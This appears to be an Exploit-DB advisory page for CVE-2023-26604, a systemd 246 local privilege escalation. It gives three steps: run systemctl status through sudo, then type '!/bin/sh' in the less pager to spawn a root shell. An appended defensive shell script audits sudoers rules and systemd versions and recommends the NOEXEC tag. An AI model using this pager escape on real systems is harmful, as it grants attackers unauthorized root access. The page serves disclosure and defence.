
6 changes to exploits/shellcodes/ghdb TP-Link Archer AX21 - Unauthenticated Command Injection systemd 246 - Local Privilege Escalation Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE) Request-Baskets v1.2.1 - Server-side request forgery (SSRF) OutSystems Service Studio 11.53.30 - DLL Hijacking
17 lines
No EOL
660 B
Text
# Exploit Title: systemd 246 - Local Privilege Escalation
# Exploit Author: Iyaad Luqman K (init_6)
# Application: systemd 246
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-26604
systemd 246 was discovered to contain a privilege escalation vulnerability when the `systemctl status` command can be run as the root user.
This vulnerability allows a local attacker to gain root privileges.
## Proof Of Concept:
1. Run the systemctl command that can be run as the root user.
sudo /usr/bin/systemctl status any_service
2. The output is opened in a pager (less), which allows us to execute arbitrary commands.
3. Type `!/bin/sh` in the pager to spawn a shell as the root user.
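
To check a host for the configuration the steps above depend on, the following added example (not part of the original write-up or of systemd) flags sudoers rules that grant `systemctl` without the `NOEXEC` tag and tests a `systemctl --version` string against a version threshold. The function names and sample data are constructed, and the 247 threshold is an assumption taken from the CVE record, not from this page.

```shell
#!/bin/sh
# Added example: defensive audit helpers; function names are hypothetical.

# Constructed sample sudoers content (not taken from any real host).
SAMPLE_SUDOERS='# constructed sample
alice ALL=(root) NOPASSWD: /usr/bin/systemctl status *
bob ALL=(root) NOEXEC: /usr/bin/systemctl status nginx
carol ALL=(root) /usr/bin/journalctl -u nginx
%ops ALL=(ALL) NOPASSWD: /bin/systemctl restart app, /bin/systemctl status app'

# Read sudoers text on stdin and print every non-comment rule that names
# systemctl and carries no NOEXEC tag. Line-level heuristic only: it does not
# expand Cmnd_Alias definitions or join backslash-continued lines.
risky_systemctl_rules() {
    grep -v '^[[:space:]]*#' \
        | grep -E '(^|[[:space:]/])systemctl([[:space:],]|$)' \
        | grep -v 'NOEXEC:' || true
}

# $1 is the output of `systemctl --version`. Succeeds (exit 0) when the major
# version on its first line is below 247 (assumed threshold, from the CVE
# record rather than from the write-up above).
systemd_lacks_pager_hardening() {
    ver=$(printf '%s\n' "$1" | sed -n '1s/^systemd \([0-9][0-9]*\).*/\1/p')
    [ -n "$ver" ] && [ "$ver" -lt 247 ]
}

# Demo on the constructed data. On a real host, feed it the sudoers files
# (as root) and "$(systemctl --version)" instead.
echo "Rules that let a pager spawn commands:"
printf '%s\n' "$SAMPLE_SUDOERS" | risky_systemctl_rules
if systemd_lacks_pager_hardening 'systemd 246 (246.6)'; then
    echo "systemd 246: below 247, treat sudo systemctl rules as root-equivalent"
fi
```

Rules it flags can be tightened with the sudoers `NOEXEC:` tag, which keeps the pager from executing a shell.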